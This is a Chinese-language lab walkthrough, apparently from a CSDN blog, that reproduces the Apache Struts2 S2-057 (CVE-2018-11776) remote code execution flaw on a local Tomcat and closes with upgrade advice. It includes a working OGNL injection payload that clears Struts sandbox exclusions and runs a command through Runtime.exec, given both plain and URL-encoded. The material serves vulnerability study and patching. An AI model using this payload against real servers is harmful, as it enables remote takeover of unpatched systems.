struts2漏洞_Struts2-057漏洞从搭建到复现

最新推荐文章于 2024-08-07 15:05:57 发布
最新推荐文章于 2024-08-07 15:05:57 发布
阅读量639 收藏
点赞数
文章标签: struts2漏洞 struts2通配符

690686caf79e25e83cf0a4adc37b90d8.png

Free雅轩 合天智汇

漏洞描述
2018年8月23日,ApacheStrust2发布最新安全公告,ApacheStruts2 存在远程代码执行的高危漏洞,该漏洞由SemmleSecurity Researchteam的安全研究员汇报,漏洞编号为CVE-2018-11776(S2-057)。Struts2在XML配置中如果namespace值未设置且(ActionConfiguration)中未设置或用通配符namespace时可能会导致远程代码执行。影响版本Struts2.3 to 2.3.34 and Struts 2.5 to 2.5.16CVE编号
CVE-2018-11776漏洞复现
复现环境操作系统:Windows10Struts版本:Struts-2.3.34Tomcat版本:ApacheTomcat/7.0.88环境搭建:首先在安装struts环境之前我们先在自己电脑上安装jdk环境,再设置好环境变量。这个我就不细说了,相信大家都会。接着我们把tomcat包解压。

dcf8729175d920622e263c461c7580c2.png


完成后,将Struts-2.3.34.下载完成后我们把该压缩包里的struts2-showcase.war放至在tomcat下的webapps目录下进行自动部署。Struts-2.3.34下载地址:http://archive.apache.org/dist/struts/2.3.34/struts-2.3.34-all.zipWar放至完成后我们再来在tomcat下bin目录下运行startup.bat脚本就可以自动运行tomcat来部署struts2了。成功部署完成后我们在浏览器中输入http://127.0.0.1:8080/struts2-showcase就可以部署成功了。

15549a3777259eee91bdb5bcdefdae32.png


正常部署完成struts如上所示,但为了复现struts2-057漏洞。我们的满足跳转的条件。故此我们的进行修改默认的action控制器来设置跳转的逻辑。方便我们复现漏洞。
需要修改的地方有两处:
1、D:tomcatwebappsstruts2-showcaseWEB-INFsrcjavastruts-actionchaining.xml
2、D:tomcatwebappsstruts2-showcaseWEB-INFclassesstruts-actionchaining.xml
我们注释掉原来的xml文件。修改为如下所示:

a873dd37ea1c3a3927d412cab6ca9d42.png


代码如下标红部分:
<code>
<struts>
<packagename="actionchaining" extends="struts-default">
<actionname="actionChain1"class="org.apache.struts2.showcase.actionchaining.ActionChain1">
<resulttype="redirectAction">
<param name = "actionName">register2</param>
</result>
</action>
<actionname="actionChain2"class="org.apache.struts2.showcase.actionchaining.ActionChain2">
<resulttype="chain">actionChain3</result>
</action>
<actionname="actionChain3"class="org.apache.struts2.showcase.actionchaining.ActionChain3">
<result>/WEB-INF/actionchaining/actionChainingResult.jsp</result>
</action>
</package>
</struts>
</code>
修改完成后保存重启tomcat服务。
漏洞测试:配置好所有所需的环境之后,我们来测试struts2-057漏洞。首先我们构造payload:http://127.0.0.1:8080/struts2-showcase/${(222+333)}/actionChain1.action
执行完成之后发现跳转到了:http://127.0.0.1:8080/struts2-showcase/555/register2.action

c4aeefc53ae34da2a8c055215aaa0334.png


222+333=555发生了运算跳转。说明存在OGNL注入。证明漏洞存在。随后在进行调用本地计算器命令来测试。
Payload如下所示:
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec("calc"))}
执行之前我们先进行URL编码得到如下:
%24%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%63%6d%64%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%29%7d
拼接如下的url进行测试:http://127.0.0.1:8080/struts2-showcase/%24%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%63%6d%64%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%29%7d/actionChain1.action
成功调用本地计算器。

f07a660306563aca2b05fb4a54195806.png

修复建议

  1. 升级到Struts 2.3.35或Struts 2.5.17的高版本
  2. 验证您是否已namespace为基础配置中的所有已定义结果设置(并且始终不会忘记设置)(如果适用)。还要验证您是否已设置(并且始终不会忘记设置)value或JSP中的action所有url标记。仅当它们的上部动作配置没有或通配符时才需要它们namespace。
weixin_39942785
关注
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057CVE-2018-11776
qq_51577576的博客
12-10 589
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057CVE-2018-11776漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1496
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
struts2-057漏洞复现
小小猪的博客
10-29 225
struts2-057漏洞复现 环境复现: 直接开始,这里要膜拜一下大佬链接 首先本地使用docker部署vulhub,详细的可以参考https://www.douban.com/note/664677507/,或者百度一下,度娘上面说的还是蛮详细的。 大概来写下步骤 首先安装git yum install git-core 安装完成之后运行一下git clone试试,如果出现选项就说明安装成功了 安装docker sudo yum -y install docker-ce 尝试..
struts2,S2-057远程执行代码漏洞
最新发布
weixin_69065643的博客
08-07 230
在url处输入 /${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。抓包,将246验证位置换成我们的payload。访问网站的/struts2-showcase。
Struts2-057远程代码执行漏洞(s2-057/CVE-2018-11776)复现
bamanju0574的博客
08-21 928
参考了大佬的链接:https://github.com/jas502n/St2-057 00x01前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2。 Struts2是一个基于MVC设计模式的Web应用框架...
[漏洞复现]Struts2-057远程命令执行
wwxxee
05-22 598
Struts2-057远程代码执行漏洞复现 影响版本: <= Struts 2.3.34 Struts 2.5.16 简述: 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。 url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。 a1waysSelectFul1Namespace为true—action元素没有设置namesp
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1100
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638)
qq_51577576的博客
11-20 830
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638) Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。
渗透测试-struts2攻防环境搭建拿shell
lza20001103的博客
04-14 2025
渗透测试之struts2攻防环境搭建
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
关于解决 Apache_Struts2漏洞(S2-045,CVE-2017-5638),包含说明与所需资源
struts2-057-exp
08-28
struts2-057-exp **Struts2-057/CVE-2018-11776两个版本RCE漏洞分析(含EXP)
struts2-showcase.rar
03-03
struts2-showcase.rar struts2自带的源码例子
struts2-057扫描工具
08-27
Struts2上一个严重的远程代码执行漏洞struts2-057 该扫描工具 支持批量扫描检查
Struts2-057漏洞检测python脚本
11-04
Struts2-057检测python脚本,支持命令回显,计算和弹计算器
漏洞平台之struts图文详细搭建教程
安全界的彭于晏的博客
06-12 246
1 安装JspStudy,启动JspStudy 2 配置110端口 3 将struts2-showcase.war考到C:\JspStudy\tomcat\webapps并解压 4 浏览器输入http://192.168.31.145:8082/struts2-showcase/
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
qq_53058639的博客
06-08 1581
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。在账号密码的输入框中测试是否存在漏洞
Struts2 S2-061 远程命令执行漏洞CVE-2020-17530)复现
内心不种满鲜花就会长满杂草
02-26 5077
目录 漏洞简介 影响版本 漏洞复现 docker-compose文件搭建漏洞环境 漏洞测试 修复建议 漏洞检测poc 漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。 影响版本 Apache Struts 2.0.0.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值